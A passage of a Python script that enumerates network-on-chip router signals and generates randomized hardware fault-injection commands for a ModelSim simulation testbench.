list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_W_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_W_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_N_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_E_W") # Input E requesting Output W ?!
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_W_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_S_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_L_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_N_sig") # ??
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_E_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_W_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_S_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_L_sig")
list_of_widths += [1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
if i%network_size != network_size-1: # has port E
# Output signals of Allocator related to output E
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:valid_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_N") # The _signal should have fault injected or the main one ? i.e. grant_N_N or grant_N_N_signal ?! Because checker is checking grant_N_N_sig.
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_L")
# # Internal signals of Allocator related to output E
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_E_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_E_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_N_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_E_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_W_E") # Input W requesting Output E ?!
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_S_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_L_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_N_sig") # ??
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_E_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_W_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_S_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_L_sig")
list_of_widths += [1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
return list_of_ports, list_of_widths
def list_all_the_fifo_signals(network_size):
"""
takes the network size and returns a list of all the relevant FIFO signals in the network
"""
list_of_ports = []
list_of_widths = []
# Every router has the Local port
for i in range(0, network_size*network_size):
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:FIFO_MEM_1")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:FIFO_MEM_2")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:FIFO_MEM_3")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:FIFO_MEM_4")
# Internal signals of FIFO
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:read_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:read_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:write_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:write_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:credit_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:empty")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:full")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:read_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:write_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:fake_credit")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:fake_credit_counter")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:fake_credit_counter_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:state_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:state_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:fault_info_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:fault_info_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:faulty_packet_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:faulty_packet_in")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:flit_type") -- flit_type is an alias
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_L:write_fake_flit")
list_of_widths += [4, 4, 4, 4, 1, 1, 1, 1, 1, 1, 2, 2, 5, 5, 1, 1, 1, 1, 1]
# for i in range(0, network_size*2):
if i/network_size != 0: # has port N
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:FIFO_MEM_1")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:FIFO_MEM_2")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:FIFO_MEM_3")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:FIFO_MEM_4")
# Internal signals of FIFO
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:read_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:read_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:write_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:write_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:credit_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:empty")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:full")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:read_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:write_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:fake_credit")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:fake_credit_counter")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:fake_credit_counter_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:state_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:state_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:fault_info_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:fault_info_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:faulty_packet_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:faulty_packet_in")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:flit_type") -- flit_type is an alias
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_N:write_fake_flit")
list_of_widths += [4, 4, 4, 4, 1, 1, 1, 1, 1, 1, 2, 2, 5, 5, 1, 1, 1, 1, 1]
if i/network_size != network_size-1: # has port S
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:FIFO_MEM_1")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:FIFO_MEM_2")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:FIFO_MEM_3")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:FIFO_MEM_4")
# Internal signals of FIFO
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:read_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:read_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:write_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:write_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:credit_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:empty")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:full")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:read_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:write_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:fake_credit")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:fake_credit_counter")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:fake_credit_counter_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:state_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:state_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:fault_info_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:fault_info_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:faulty_packet_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:faulty_packet_in")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:flit_type") -- flit_type is an alias
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_S:write_fake_flit")
list_of_widths += [4, 4, 4, 4, 1, 1, 1, 1, 1, 1, 2, 2, 5, 5, 1, 1, 1, 1, 1]
if i%network_size != 0: # has port W
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:FIFO_MEM_1")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:FIFO_MEM_2")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:FIFO_MEM_3")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:FIFO_MEM_4")
# Internal signals of FIFO
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:read_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:read_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:write_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:write_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:credit_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:empty")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:full")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:read_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:write_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:fake_credit")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:fake_credit_counter")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:fake_credit_counter_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:state_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:state_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:fault_info_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:fault_info_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:faulty_packet_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:faulty_packet_in")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:flit_type") -- flit_type is an alias
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_W:write_fake_flit")
list_of_widths += [4, 4, 4, 4, 1, 1, 1, 1, 1, 1, 2, 2, 5, 5, 1, 1, 1, 1, 1]
if i%network_size != network_size-1: # has port E
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:FIFO_MEM_1")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:FIFO_MEM_2")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:FIFO_MEM_3")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:FIFO_MEM_4")
# Internal signals of FIFO
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:read_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:read_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:write_pointer")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:write_pointer_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:credit_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:empty")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:full")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:read_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:write_en")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:fake_credit")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:fake_credit_counter")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:fake_credit_counter_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:state_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:state_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:fault_info_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:fault_info_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:faulty_packet_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:faulty_packet_in")
# list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:flit_type") -- flit_type is an alias
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":FIFO_E:write_fake_flit")
list_of_widths += [4, 4, 4, 4, 1, 1, 1, 1, 1, 1, 2, 2, 5, 5, 1, 1, 1, 1, 1]
return list_of_ports, list_of_widths
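# The two returned lists are parallel: list_of_widths[i] gives the bit-width of
# the signal named in list_of_ports[i]. A minimal sanity-check sketch
# (illustrative only; the 2x2 network size is an arbitrary example value):
#
#     ports, widths = list_all_the_fifo_signals(2)
#     assert len(ports) == len(widths)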
def generate_links_dictionary(network_size, sim_time):
"""
This function generates random faults on all RX signals of the network
"""
list_of_ports = []
list_of_widths = []
ports, widths = list_all_the_links(network_size)
list_of_ports += ports
list_of_widths += widths
# ports, widths = list_all_the_lbdr_signals(network_size)
# list_of_ports += ports
# list_of_widths += widths
# ports, widths = list_all_the_fifo_signals(network_size)
# list_of_ports += ports
# list_of_widths += widths
# ports, widths = list_all_the_arbiter_signals(network_size)
# list_of_ports += ports
# list_of_widths += widths
random.seed(FAULT_RANDOM_SEED)
fault_list = []
for item in list_of_ports:
item_index = list_of_ports.index(item)
width = list_of_widths[item_index]
# fault_type = random.choice(["T", "P", "I", "T->P", "T->I"])
fault_type = random.choice(["T"])
shut_down_time = None
std_dev = None
if fault_type == "T": # Transient fault
frequency = random.choice(["H", "M", "L"])
if frequency == "H":
mean_time = int((1000000000/Fault_Per_Second)/HIGH_FAULT_RATE)
            elif frequency == "M":
                mean_time = int((1000000000/Fault_Per_Second)/MEDIUM_FAULT_RATE)
            else:
                mean_time = int((1000000000/Fault_Per_Second)/LOW_FAULT_RATE)
std_dev = int(mean_time*0.1+1)
elif fault_type == "I" or fault_type == "T->I": # Intermittent fault or transient to intermittent
mean_time = int(MTB_INTERMITTENT_BURST)
std_dev = int(mean_time*0.1+1)
elif fault_type == "P": # its Permentent fault
mean_time = None
std_dev = None
shut_down_time = random.randint(int(sim_time*0.1), int(sim_time*0.9))
elif fault_type == "T->P": # Transient goes to Intermittent and then to Permanent
mean_time = int(1000000000/Fault_Per_Second)
shut_down_time = random.randint(int(sim_time*0.1), int(sim_time*0.9))
std_dev = int(mean_time*0.1+1)
new_fault = fault(item, width, fault_type, mean_time, std_dev, shut_down_time)
fault_list.append(new_fault)
report_faults(fault_list)
return fault_list
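# Illustrative sketch of inspecting the generated list (values are placeholders;
# the fault objects expose the attributes used by generate_fault_injection_do
# further below, e.g. Type, location, mean_time):
#
#     faults = generate_links_dictionary(network_size=2, sim_time=10000)
#     transient_faults = [f for f in faults if f.Type == "T"]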
def parse_fault_info_file(file_path):
"""
If you want to feed the fault info from a file...
the file lines should be organized like this:
    fault_location signal_width fault_type MTBF std_deviation shutdown_time
fault_location: the signal bit that you want to inject the fault on.
signal_width: The width of the signal that you intend to inject the bit-flip in
    fault_type: should be chosen from the following list:
* T : Transient
* I : Intermittent
* P : Permanent
* T->P : Transient to Intermittent to permanent
* T->I : Transient to Intermittent
MTBF: Mean time between the faults
std_deviation: Standard deviation used for generating faults
    shutdown_time: Time in ns at which the signal becomes permanently faulty; only used
                   for permanent faults, otherwise "None".
Example:
tb_network_2x2:NoC:R_0:RX_L(21) 32 I 1000 101 None
"""
fault_list = []
fault_info_file = open(file_path, 'r')
line = fault_info_file.readline()
while line != "":
split_line = line.split()
fault_location = split_line[0]
signal_width = int(split_line[1])
fault_type = split_line[2]
fault_MTBF = split_line[3]
fault_STD = split_line[4]
shut_down_time = split_line[5]
new_fault = fault(fault_location, signal_width, fault_type, fault_MTBF, fault_STD, shut_down_time)
fault_list.append(new_fault)
line = fault_info_file.readline()
return fault_list
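# Illustrative example of the expected file contents (one fault per line, fields
# separated by whitespace, matching the format documented above; signal names and
# numbers are placeholders):
#
#     tb_network_2x2:NoC:R_0:RX_L(21) 32 T 1000 101 None
#     tb_network_2x2:NoC:R_1:RX_N(3) 32 P None None 5000
#
#     fault_list = parse_fault_info_file("fault_info.txt")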
#----------------------------------------------------------------------------------------------
#
# Generating the actual do file.
#
#----------------------------------------------------------------------------------------------
def generate_fault_injection_do(file_path, sim_time, sim_end, fault_list):
"""
Generates a do file for modelsim for injecting the faults
fault_path: string : path to the fault_inject.do
sim_time: integer : How long do you want to inject faults in the simulation ns
sim_end: integer : end of simulation
fault_list: list : list of fault objects for injection
the generated faults would look like these:
*T: ___|____________|____________|____________|____________|____________|____________|____________|
Transient faults happen periodically with a normal distribution with mean time between faults and a
standard deviation
*I: ____________________________||||||||||______________________________________||||||||||_________
Intermittent faults happen in bursts periodically with a normal distribution with mean time between
    faults and a standard deviation. Each burst injects EVENTS_PER_BURST stuck-at faults.
*P: __________________________________________________|''''''''''''''''''''''''''''''''''''''''''''
Permanent faults happen right after the specified shutdown time.
*T->I: ___|____________|____________|____________||||||||||____________________________||||||||||_____
    First it behaves as transient, then becomes intermittent. For the transient phase it uses the MTBF and
    Std_Dev specified in the fault object; for the intermittent phase it uses the values specified in the
    package file.
*T->P: ___|____________|____________|____________||||||||||______________________|''''''''''''''''''''
    First it behaves as transient, then turns intermittent and finally permanent. For the transient phase it
    uses the MTBF and Std_Dev specified in the fault object; for the intermittent phase it uses the values
    specified in the package file. For becoming permanent, it uses the shutdown time specified in the fault
    object.
"""
list_of_links = fault_list
delay = 1000000000/Fault_Per_Second
deviation = int(delay/10)
if deviation == 0:
deviation = 1
fault_inject_file = open(file_path+'/fault_inject.do', 'w')
permanently_faulty_locations = []
temp_dict = {}
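    # temp_dict maps an integer injection time (in ns) to the list of fault objects
    # that get a force command written at that time; it is consumed in time order by
    # the "for i in range(0, sim_time)" loop further below.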
for item in list_of_links:
if item.Type == "T":
fault_time = 0
time_until_next_fault = numpy.random.normal(item.mean_time, item.std_dev)
fault_time += time_until_next_fault
while fault_time < sim_time:
if int(fault_time) in temp_dict.keys():
temp_dict[int(fault_time)].append(item)
else:
temp_dict[int(fault_time)] = [item]
time_until_next_fault = numpy.random.normal(item.mean_time, item.std_dev)
fault_time += time_until_next_fault
if item.Type == "I":
fault_time = 0
time_until_next_fault = numpy.random.normal(item.mean_time, item.std_dev)
fault_time += time_until_next_fault
while fault_time < sim_time:
for event in range(0, EVENTS_PER_BURST):
if int(fault_time+event) in temp_dict.keys():
temp_dict[int(fault_time+event)].append(item)
else:
temp_dict[int(fault_time+event)] = [item]
time_until_next_fault = numpy.random.normal(item.mean_time, item.std_dev)
fault_time += time_until_next_fault
if item.Type == "T->I":
permanently_faulty_locations.append(item)
fault_time = 0
time_until_next_fault = numpy.random.normal(item.mean_time, item.std_dev)
fault_time += time_until_next_fault
while fault_time < int(sim_time*0.5):
if int(fault_time) in temp_dict.keys():
temp_dict[int(fault_time)].append(item)
else:
temp_dict[int(fault_time)] = [item]
time_until_next_fault = numpy.random.normal(item.mean_time, item.std_dev)
fault_time += time_until_next_fault
time_until_next_fault = numpy.random.normal(int(MTB_INTERMITTENT_BURST), \
int(MTB_INTERMITTENT_BURST*0.1+1))
fault_time += time_until_next_fault
while fault_time+EVENTS_PER_BURST < int(sim_time):
for event in range(0, EVENTS_PER_BURST):
if int(fault_time+event) in temp_dict.keys():
temp_dict[int(fault_time+event)].append(item)
else:
temp_dict[int(fault_time+event)] = [item]
time_until_next_fault = numpy.random.normal(int(MTB_INTERMITTENT_BURST), \
int(MTB_INTERMITTENT_BURST*0.1+1))
fault_time += time_until_next_fault
if item.Type == "P":
permanently_faulty_locations.append(item)
if item.Type == "T->P":
permanently_faulty_locations.append(item)
fault_time = 0
time_until_next_fault = numpy.random.normal(item.mean_time, item.std_dev)
fault_time += time_until_next_fault
while fault_time < int(item.shut_down_time*0.5):
if int(fault_time) in temp_dict.keys():
temp_dict[int(fault_time)].append(item)
else:
temp_dict[int(fault_time)] = [item]
time_until_next_fault = numpy.random.normal(item.mean_time, item.std_dev)
fault_time += time_until_next_fault
time_until_next_fault = numpy.random.normal(int(MTB_INTERMITTENT_BURST), \
int(MTB_INTERMITTENT_BURST*0.1+1))
fault_time += time_until_next_fault
while fault_time+EVENTS_PER_BURST < int(item.shut_down_time):
for event in range(0, EVENTS_PER_BURST):
if int(fault_time+event) in temp_dict.keys():
temp_dict[int(fault_time+event)].append(item)
else:
temp_dict[int(fault_time+event)] = [item]
time_until_next_fault = numpy.random.normal(int(MTB_INTERMITTENT_BURST), \
int(MTB_INTERMITTENT_BURST*0.1+1))
fault_time += time_until_next_fault
fault_inject_file.write("#################################\n")
current_time = 0
for i in range(0, sim_time):
for permanent_fault_location in permanently_faulty_locations:
if i == permanent_fault_location.shut_down_time:
location = permanent_fault_location.location
fault_inject_file.write("# ###################################################\n")
fault_inject_file.write("# Shutting down signal: "+location+" for good!\n")
fault_inject_file.write("force -drive sim/:"+location+" U 1ns\n")
fault_inject_file.write("# ###################################################\n")
if i in temp_dict.keys():
last_time = current_time
current_time = i
